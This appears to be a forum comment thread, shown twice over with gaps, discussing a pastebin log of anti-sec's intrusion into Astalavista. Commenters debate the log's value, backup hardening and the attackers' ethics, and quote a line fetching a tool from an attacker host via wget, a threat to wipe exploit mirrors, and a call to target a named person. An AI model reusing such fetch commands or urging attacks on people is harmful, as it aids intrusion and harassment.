Astalavista Hack Act 2 (opens in new tab)

(pastebin.com)

64 pointstreo17y ago24 comments

24 comments

21 comments · 11 top-level

mahmud17y ago· 3 in thread

Seems like people are discovering "hacklogs"; they're published in scene zines and are mostly harmful. The only reason to read them is for schadenfreude; it's usually one hacker taking out another, I don't think the misfortunes of civilians are logged.

For a glimpse into this, and for the most entertaining hacker interview ever conducted, I invite you all to read the phrack interview with The Unix Terrorist:

http://phrack.org/issues.html?issue=65&id=2#article

A magnificent display of ego, knowledge and balls. A laugh out loud tale of human malice! A+.

noodle17y ago

i dunno if the only reason is for schadenfreude.

i mentioned it in the other thread, but i read them to see what other people are doing wrong in order to remind myself of what i need to do to do things right.

mahmud17y ago

Hard to believe that. If you can grok the logs you probably know how and why the hack works. Plus they're not too informative, for example, few of them show the version of an application under attack, and a good chunk of the time you will see a line like:

  ~ $./domagic
  ~ #

Where `domagic` is published script.

There are good texts to read for security, and imo, lamer logs are not exactly at the top of that list. Read the public disclosures, advisories, PoC code; not the private gloating of hackers :-)

1 more reply

gamache17y ago

That has to be the most pointless "interview" I have ever read.

devicenull17y ago· 3 in thread

While it sucks for the people involved, these posts just got me to go verify that all my sites have backups setup, and that the backups cannot be deleted via ftp

Confusion17y ago

The best way to prevent against that is not having your production boxes copy backups elsewhere, but rather have other boxes, if possible ones that are unreachable from the outside, fetch the backup. The most secure backup machine exposes no services and only fetches backups. No one will detect the box and no one will detect where the backups are stored, unless they wait around on your box for the backups to be fetched. Even then, what are they going to do? A box that only allows outbound connections is very hard to hack.

c00p3r17y ago

use scp instead.

devicenull17y ago

The backups are encrypted with gpg before they are sent anyway, so it's not a big issue.

ilitirit17y ago· 2 in thread

>> // We at anti-sec, hope you never heal :]

I hope I'm not the only one who thinks that this is taking things too far. Compromising his server is one thing, compromising his health and delving into his personal life and exposing the details of others who have no relation to this little vendetta is another. Personally, I hope whoever is responsible gets caught.

notdarkyet17y ago

Yeah I was coming to post the same thing. I "kind of" feel bad for this guy. Granted he might not be the most ethical of people, this might be going a little over the line. I wish I knew some back story as to why they are going after him other than just the fact that they run a crappy site (astalavista.com).

sorbus17y ago

It might be because he has a script to mirror milw0rm - line 1387 states "If you by any means mirror milw0rm / exploits, you are a target and you _will_ be rm'd. only a matter of time."

Maybe not the primary reason, but probably a contributing one.

ilitirit17y ago· 1 in thread

Response on reddit:

http://www.reddit.com/r/programming/comments/8r04o/pwned_par...

kragen17y ago

Response has been deleted.

ideamonk17y ago· 1 in thread

The good part - we get a view of what one does when on gets into your box, this is good enough to build defense/alert systems against such activities...

lamnk17y ago

There is not much to learn: 99% of the hacklog is looking around (ls, cat, mysql show tables ...), 1% is rm'ing and dropping database. Interesting things like vulnerabilities, exploit methods were done by some appear-out-of-thin-air magic scripts.

jrnkntl17y ago

"sh-3.1$ wget http://anti.sec.labs/MichaelScofield

That, ladies and gentlemen, to escape from a jailshell is just plain funny.

treoOP17y ago

If anyone missed act 1: http://news.ycombinator.com/item?id=642671

ideamonk17y ago

__According to__ nowayout, it is fake http://pastebin.com/m1ddc62d7 ,

bot nobody cares/agrees to him on #bhf

plus its a nice read indeed, as twitter.com/linuxing said "its like geek porn..."

Torn17y ago

anyone got a dump? the pastebin entry was deleted

c00p3r17y ago

Good fiction! I think some pieces could be inserted in some hi-tech serials and even books.

creep517y ago

anti-sec should do something about Mr. Ankit Fadia too, he is one jerk who would easily figure out in anti-sec's top 10 targets.

j / k navigate · click thread line to collapse

24 comments

21 comments · 11 top-level

mahmud17y ago· 3 in thread

For a glimpse into this, and for the most entertaining hacker interview ever conducted, I invite you all to read the phrack interview with The Unix Terrorist:

http://phrack.org/issues.html?issue=65&id=2#article

A magnificent display of ego, knowledge and balls. A laugh out loud tale of human malice! A+.

noodle17y ago

i dunno if the only reason is for schadenfreude.

i mentioned it in the other thread, but i read them to see what other people are doing wrong in order to remind myself of what i need to do to do things right.

mahmud17y ago

  ~ $./domagic
  ~ #

Where `domagic` is published script.

There are good texts to read for security, and imo, lamer logs are not exactly at the top of that list. Read the public disclosures, advisories, PoC code; not the private gloating of hackers :-)

1 more reply

gamache17y ago

That has to be the most pointless "interview" I have ever read.

devicenull17y ago· 3 in thread

While it sucks for the people involved, these posts just got me to go verify that all my sites have backups setup, and that the backups cannot be deleted via ftp

Confusion17y ago

c00p3r17y ago

use scp instead.

devicenull17y ago

The backups are encrypted with gpg before they are sent anyway, so it's not a big issue.

ilitirit17y ago· 2 in thread

>> // We at anti-sec, hope you never heal :]

notdarkyet17y ago

sorbus17y ago

It might be because he has a script to mirror milw0rm - line 1387 states "If you by any means mirror milw0rm / exploits, you are a target and you _will_ be rm'd. only a matter of time."

Maybe not the primary reason, but probably a contributing one.

ilitirit17y ago· 1 in thread

Response on reddit:

http://www.reddit.com/r/programming/comments/8r04o/pwned_par...

kragen17y ago

Response has been deleted.

ideamonk17y ago· 1 in thread

The good part - we get a view of what one does when on gets into your box, this is good enough to build defense/alert systems against such activities...

lamnk17y ago

jrnkntl17y ago

"sh-3.1$ wget http://anti.sec.labs/MichaelScofield

That, ladies and gentlemen, to escape from a jailshell is just plain funny.

treoOP17y ago

If anyone missed act 1: http://news.ycombinator.com/item?id=642671

ideamonk17y ago

__According to__ nowayout, it is fake http://pastebin.com/m1ddc62d7 ,

bot nobody cares/agrees to him on #bhf

plus its a nice read indeed, as twitter.com/linuxing said "its like geek porn..."

Torn17y ago

anyone got a dump? the pastebin entry was deleted

c00p3r17y ago

Good fiction! I think some pieces could be inserted in some hi-tech serials and even books.

creep517y ago

anti-sec should do something about Mr. Ankit Fadia too, he is one jerk who would easily figure out in anti-sec's top 10 targets.

j / k navigate · click thread line to collapse